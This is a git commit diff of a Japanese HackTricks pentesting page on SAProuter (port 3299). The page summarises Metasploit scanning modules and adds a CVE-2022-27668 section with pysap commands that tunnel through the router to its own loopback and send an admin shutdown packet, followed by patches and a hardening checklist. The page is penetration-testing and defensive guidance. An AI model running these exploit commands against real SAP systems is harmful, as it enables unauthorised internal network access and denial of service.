Translated ['src/network-services-pentesting/3299-pentesting-saprouter.m

This commit is contained in:
Translator 2025-08-14 06:16:08 +00:00
parent 82288edfb3
commit e6d28cd974

View File

@ -1,9 +1,11 @@
# # 3299/tcp - SAProuterのペンテスト
{{#include ../banners/hacktricks-training.md}}
```text
PORT STATE SERVICE VERSION
3299/tcp open saprouter?
```
これは、[https://blog.rapid7.com/2014/01/09/piercing-saprouter-with-metasploit/](https://blog.rapid7.com/2014/01/09/piercing-saprouter-with-metasploit/)の投稿の要約です。
これは、[https://blog.rapid7.com/2014/01/09/piercing-saprouter-with-metasploit/](https://blog.rapid7.com/2014/01/09/piercing-saprouter-with-metasploit/) の投稿の要約です。
## Metasploitを使用したSAProuterの侵入テストの理解
@ -11,13 +13,13 @@ SAProuterは、主にインターネットと内部SAPネットワーク間の
**スキャンと情報収集**
最初に、**sap_service_discovery**モジュールを使用して、特定のIPでSAPルーターが実行されているかどうかを特定するためにスキャンが実行されます。このステップは、SAPルーターの存在とそのオープンポートを確するために重要です。
最初に、**sap_service_discovery**モジュールを使用して、特定のIP上でSAPルーターが稼働しているかどうかを特定するためにスキャンが実行されます。このステップは、SAPルーターの存在とそのオープンポートを確するために重要です。
```text
msf> use auxiliary/scanner/sap/sap_service_discovery
msf auxiliary(sap_service_discovery) > set RHOSTS 1.2.3.101
msf auxiliary(sap_service_discovery) > run
```
発見に続いて、**sap_router_info_request** モジュールを使用して SAP ルーターの構成に関するさらなる調査が行われ、内部ネットワークの詳細が明らかになる可能性があります。
発見に続いて、**sap_router_info_request** モジュールを使用してSAPルーターの設定に関するさらなる調査が行われ、内部ネットワークの詳細が明らかになる可能性があります。
```text
msf auxiliary(sap_router_info_request) > use auxiliary/scanner/sap/sap_router_info_request
msf auxiliary(sap_router_info_request) > set RHOSTS 1.2.3.101
@ -25,7 +27,7 @@ msf auxiliary(sap_router_info_request) > run
```
**内部サービスの列挙**
取得した内部ネットワークの洞察をもとに、**sap_router_portscanner** モジュールを使用して、SAProuterを介して内部ホストとサービスを調査し、内部ネットワークとサービス構成のより深い理解を得ることができます。
取得した内部ネットワークの洞察をもとに、**sap_router_portscanner** モジュールを使用して、SAProuterを介して内部ホストとサービスを調査し、内部ネットワークとサービス構成のより深い理解を可能にします。
```text
msf auxiliary(sap_router_portscanner) > set INSTANCES 00-50
msf auxiliary(sap_router_portscanner) > set PORTS 32NN
@ -34,14 +36,14 @@ msf auxiliary(sap_router_portscanner) > set PORTS 32NN
**高度な列挙とACLマッピング**
さらにスキャンを行うことで、SAProuter上でのアクセス制御リストACLの設定方法が明らかになり、どの接続が許可されているか、またはブロックされているかの詳細がわかります。この情報は、セキュリティポリシーや潜在的な脆弱性を理解する上で重要です。
さらなるスキャンにより、SAProuter上でのアクセス制御リストACLの設定が明らかになり、どの接続が許可されているか、またはブロックされているかが詳細に示されます。この情報は、セキュリティポリシーや潜在的な脆弱性を理解する上で重要です。
```text
msf auxiliary(sap_router_portscanner) > set MODE TCP
msf auxiliary(sap_router_portscanner) > set PORTS 80,32NN
```
**内部ホストのブラインド列挙**
SAProuterからの直接情報が限られているシナリオでは、ブラインド列挙のような技術を適用できます。このアプローチは、内部ホスト名の存在を推測し、検証しようとするもので、直接的なIPアドレスなしで潜在的なターゲットを明らかにします。
SAProuterからの直接情報が限られているシナリオでは、ブラインド列挙のような技術を適用できます。このアプローチは、内部ホスト名の存在を推測し確認することを試み、直接的なIPアドレスなしで潜在的なターゲットを明らかにします。
**ペネトレーションテストのための情報活用**
@ -53,13 +55,74 @@ msf auxiliary(sap_hostctrl_getcomputersystem) > run
```
**結論**
このアプローチは、SAProuterの安全な構成の重要性を強調し、ターゲットを絞ったペネトレーションテストを通じて内部ネットワークにアクセスする可能性を示しています。SAPルーターを適切に保護し、ネットワークセキュリティアーキテクチャにおけるその役割を理解することは、無許可のアクセスから保護するために重要です。
このアプローチは、SAProuterの安全な構成の重要性を強調し、ターゲットを絞ったペネトレーションテストを通じて内部ネットワークにアクセスする可能性を示しています。SAPルーターを適切に保護し、ネットワークセキュリティアーキテクチャにおけるその役割を理解することは、無許可のアクセスからるために重要です。
Metasploitモジュールとその使用法に関する詳細情報については、[Rapid7のデータベース](http://www.rapid7.com/db)を訪れてください。
Metasploitモジュールとその使用に関する詳細情報については、[Rapid7のデータベース](http://www.rapid7.com/db)を訪れてください。
---
## 最近の脆弱性 (2022-2025)
### CVE-2022-27668 不適切なアクセス制御 ➜ リモート管理コマンドの実行
2022年6月、SAPはSAProuterすべてのカーネル ≥ 7.22の重大な欠陥CVSS 9.8)に対処するセキュリティノート**3158375**をリリースしました。認証されていない攻撃者は、許可された`saprouttab`エントリを悪用して、リモートホストから**管理パケット**(例:*shutdown*、*trace-level*、*connection-kill*)を送信することができます。これは、ルーターが`-X`リモート管理オプションなしで起動された場合でも可能です。
この問題は、指定されていないアドレス**0.0.0.0**をターゲットにすることで、ルーター自身のループバックインターフェースへのトンネルを構築できる可能性から生じます。一度トンネルが確立されると、攻撃者はローカルホストの権限を取得し、任意の管理コマンドを実行できます。
実際の悪用は、**pysap**フレームワークを使用して再現できます:
```bash
# 1. Build a loopback tunnel through the vulnerable SAProuter
python router_portfw.py -d <ROUTER_IP> -p 3299 \
-t 0.0.0.0 -r 3299 \
-a 127.0.0.1 -l 3299 -v
# 2. Send an admin packet (here: stop the remote router)
python router_admin.py -s -d 127.0.0.1 -p 3299
```
**影響を受けるバージョン**
* スタンドアロン SAProuter 7.22 / 7.53
* カーネル 7.49, 7.77, 7.81, 7.857.88 (KRNL64NUC/UCを含む)
**修正 / 緩和策**
1. SAP Note **3158375** で提供されるパッチを適用します。
2. `saprouttab``P` および `S` 行からワイルドカード (`*`) ターゲットを削除します。
3. ルーターが `-X` オプションなしで起動され、インターネットに直接公開されていないことを確認します。
---
## 更新されたツールとトリック
* **pysap** 積極的にメンテナンスされており、カスタム NI/Router パケットの作成、ACL のファジング、CVE-2022-27668 エクスプロイトの自動化のための `router_portfw.py``router_admin.py` & `router_trace.py` を提供します。
* **Nmap** カスタム SAProuter プローブを追加してサービス検出を拡張します:
```text
Probe TCP SAProuter q|\x00\x00\x00\x00|
ports 3299
match saprouter m|SAProuter ([\d.]+)| p/SAProuter/ v/$1/
```
NSE スクリプトや `--script=banner` と組み合わせて、バナー文字列 (`SAProuter <ver> on '<host>'`) を漏洩するバージョンを迅速にフィンガープリンティングします。
* **Metasploit** 上記の補助モジュールは、pysap で作成された SOCKS または NI プロキシを介して引き続き機能し、ルーターが直接アクセスをブロックしている場合でもフルフレームワーク統合を可能にします。
---
## ハードニング & 検出チェックリスト
* 周辺ファイアウォールでポート **3299/TCP** をフィルタリング 信頼できる SAP サポートネットワークからのトラフィックのみを許可します。
* SAProuter を **完全にパッチ適用** し、`saprouter -v` で確認し、最新のカーネルパッチレベルと比較します。
* `saprouttab`**厳格なホスト固有** エントリを使用し、`*` ワイルドカードを避け、任意のホストやポートをターゲットにする `P`/`S` ルールを拒否します。
* **`-S <secudir>` + SNC** でサービスを開始し、暗号化と相互認証を強制します。
* リモート管理 (`-X`) を無効にし、可能であればリスナーを `127.0.0.1` にバインドし、必要なトラフィックのために外部リバースプロキシを使用します。
* **dev_rout** ログを監視し、疑わしい `ROUTER_ADM` パケットや予期しない `NI_ROUTE` リクエストを `0.0.0.0` に対して探します。
---
## **参考文献**
- [https://www.rapid7.com/blog/post/2014/01/09/piercing-saprouter-with-metasploit/](https://www.rapid7.com/blog/post/2014/01/09/piercing-saprouter-with-metasploit/)
- [https://sec-consult.com/vulnerability-lab/advisory/improper-access-control-in-sap-saprouter/](https://sec-consult.com/vulnerability-lab/advisory/improper-access-control-in-sap-saprouter/)
## Shodan